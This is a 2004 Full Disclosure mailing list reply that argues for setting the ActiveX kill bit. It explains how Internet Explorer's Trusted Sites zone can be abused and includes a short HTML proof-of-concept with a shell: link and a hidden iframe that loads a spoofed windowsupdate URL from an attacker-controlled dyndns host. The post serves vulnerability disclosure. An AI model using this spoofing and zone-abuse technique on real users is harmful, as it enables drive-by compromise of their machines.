Full Disclosure mailing list archives
Re: Registry Fix For Variant of Scob
From: "http-equiv () excite com" <1 () malware com>
Date: Tue, 6 Jul 2004 20:40:59 -0000
<!-- No reason to set the kill bit? Take a look at http://seclists.org/lists/fulldisclosure/2004/Jun/0318.html And I am quoting you now "You should be able to use this to compromise Windows XP SP2 through Internet Explorer despite the My Computer zone hardening since the Trusted Sites Zone has all of the privileges you need to plant and execute a file." --> "A little experience often upsets a lot of theory" as the quote goes. The so-called 'Trusted Zone' setting is by default 'LOW". It has long been the recommendation of one particlar party to suggest that in order to 'safely use the internet' deny everything else and allow only those that you trust. For example, windowsupdate.com, perhaps the holy shrine of this all: [screen shot: http://www.malware.com/ihaveabridgeforsale.png 40KB] all we then need to do and note that this is not the 'My Computer' Zone is sprinkle a bit of our magic dns into the nest, stir in a dollop of ActiveX and POOF ! magic: <center><br><br><img src="nocigar.gif"></center> <center> <a href="shell:windowssnakeoil.txt">who goes there</a></center> <iframe src="http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none"> [customise as you see fit] http://www.malware.com/stockpump.html USE THE KILL BIT PEOPLE ! Slaughter all the birds and crush all the eggs. Wipe the species out and forget about the nest forever ! There ain't no 'quick nothing' to any of this. "The want of money is the root of all evil" was the other quote. -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Registry Fix For Variant of Scob Thor Larholm (Jul 04)
- <Possible follow-ups>
- Re: Registry Fix For Variant of Scob http-equiv () excite com (Jul 06)